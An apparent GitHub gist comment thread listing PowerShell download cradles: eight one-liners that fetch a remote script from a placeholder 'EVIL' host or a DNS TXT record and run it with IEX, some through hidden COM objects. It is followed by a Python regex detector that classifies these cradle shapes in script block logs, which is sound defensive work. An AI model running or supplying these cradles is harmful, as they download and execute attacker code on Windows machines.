amalez commented Jun 15, 2017
fgfgh
go hackers
How do you do the hack? There is no more inspect.
There is surely inspect on macOS and Windows 8, and check out my gist: <script src="https://gist.github.com/kbatchelli/a4c540f02348477324c75c6611a68a67.js"></script>
uhhhhhhh hey?
how do you even hack
why is the song cradles so good?
```powershell
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# using bitstransfer - touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
#   code to execute needs to be a base64 encoded string stored in a TXT record
#   (Select-String, not Select: Select is an alias of Select-Object, which has no -Pattern parameter)
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select-String -Pattern '"*"') -split '"'[0]))))

# from @subTee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
#   the fetched file is XML; the element path below follows the $a.command.a.execute lookup
<#
<command>
  <a>
    <execute>Get-Process</execute>
  </a>
</command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
```
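Every cradle above ends in IEX (or the pipe into iex) fed by something other than a file on disk, which is what a defender should key on. The script below is an added detection example, not code from the gist or from any of its commenters: it runs a small, alias-aware rule set over constructed script block log text (the kind of text that lands in PowerShell Event ID 4104 ScriptBlockText) and names which cradle shape each block matches. The sample log lines are constructed for this example, the rule names and regexes are this example's own approximations of the cradles, and the hostnames are placeholders; a generic "iex plus a URL" fallback catches variants (DownloadData instead of DownloadString, for instance) that none of the specific rules cover.

```python
"""Classify PowerShell download-cradle shapes in script block log text.

Added detection example (not the gist's code). The sample script blocks
are constructed for this example; the regexes approximate the cradle
shapes listed above and are not a vendor signature set.
"""
import re

# PowerShell is case-insensitive and these cmdlets have short aliases,
# so every fragment is compiled with re.I and aliases are spelled out.
IEX = r"(?:iex|invoke-expression)"
IWR = r"(?:iwr|invoke-webrequest|curl|wget)"

# Each rule is a list of fragments that must ALL appear somewhere in the
# block, in any order (the DNS cradle puts FromBase64String before nslookup).
CRADLE_RULES = {
    "webclient_downloadstring": [r"net\.webclient", r"\.downloadstring\("],
    "iex_invoke_webrequest": [rf"\b{IEX}\s*\(\s*{IWR}\b"],
    "hidden_ie_com": [r"internetexplorer\.application",
                      r"\.visible\s*=\s*\$false", r"\.navigate\("],
    "msxml2_xmlhttp_com": [r"msxml2\.xmlhttp", r"\.responsetext"],
    "winhttp_com": [r"winhttp\.winhttprequest", r"\.responsetext"],
    "bits_transfer_then_iex": [r"start-bitstransfer", rf"\b{IEX}\b"],
    "dns_txt_base64": [r"nslookup\s+-querytype=txt", r"frombase64string"],
    "xmldocument_load": [r"xml\.xmldocument", r"\.load\(\s*[\"']https?://"],
}
COMPILED = {name: [re.compile(f, re.I | re.S) for f in frags]
            for name, frags in CRADLE_RULES.items()}
IEX_RX = re.compile(rf"\b{IEX}\b", re.I)
URL_RX = re.compile(r"https?://", re.I)


def classify(script_block: str) -> list[str]:
    """Return the names of every cradle rule whose fragments all match."""
    hits = [name for name, frags in COMPILED.items()
            if all(rx.search(script_block) for rx in frags)]
    # Fallback: text handed to iex together with a URL is worth a look
    # even when no specific cradle shape fired.
    if not hits and IEX_RX.search(script_block) and URL_RX.search(script_block):
        hits.append("generic_iex_with_url")
    return hits


def scan(script_blocks):
    """Yield (1-based line number, hits) for every block that matches."""
    for lineno, block in enumerate(script_blocks, 1):
        hits = classify(block)
        if hits:
            yield lineno, hits


# Constructed sample ScriptBlockText values: the eight cradles above,
# two benign blocks, a lower-case full-cmdlet-name variant, and a
# DownloadData variant that only the generic fallback catches.
SAMPLE_SCRIPT_BLOCKS = [
    'IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")',
    "IEX (iwr 'http://EVIL/evil.ps1')",
    "$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;"
    "$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;"
    "$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r",
    "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);"
    "$h.send();iex $h.responseText",
    "$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);"
    "$h.send();iex $h.responseText",
    "Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\\t;"
    "$r=gc $env:temp\\t;rm $env:temp\\t; iex $r",
    '''IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('''
    '''((nslookup -querytype=txt "SERVER" | Select-String -Pattern '"*"') -split '"'[0]))))''',
    '$a = New-Object System.Xml.XmlDocument; '
    '$a.Load("https://gist.githubusercontent.com/EXAMPLE/raw/gistfile1.txt"); '
    '$a.command.a.execute | iex',
    "Invoke-WebRequest -Uri 'https://example.invalid/tools.zip' -OutFile C:\\temp\\tools.zip",
    "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",
    "invoke-expression (invoke-webrequest 'http://EVIL/evil.ps1')",
    "iex ([Text.Encoding]::UTF8.GetString((New-Object Net.WebClient)"
    ".DownloadData('http://EVIL/evil.ps1')))",
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {lineno:2d}: {', '.join(hits)}")
```

The rules deliberately match on the COM ProgIDs, cmdlet names and .NET members rather than on the URL, because the DNS TXT cradle never contains a URL at all and the WinHttp and BITS variants are easy to miss if a detection only watches for Net.WebClient. Blocks 9 and 10 (a plain download to disk and a process listing) produce no hits, which is the false-positive check a practitioner should keep in any such rule set.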
how do you hack and not feel wrong about it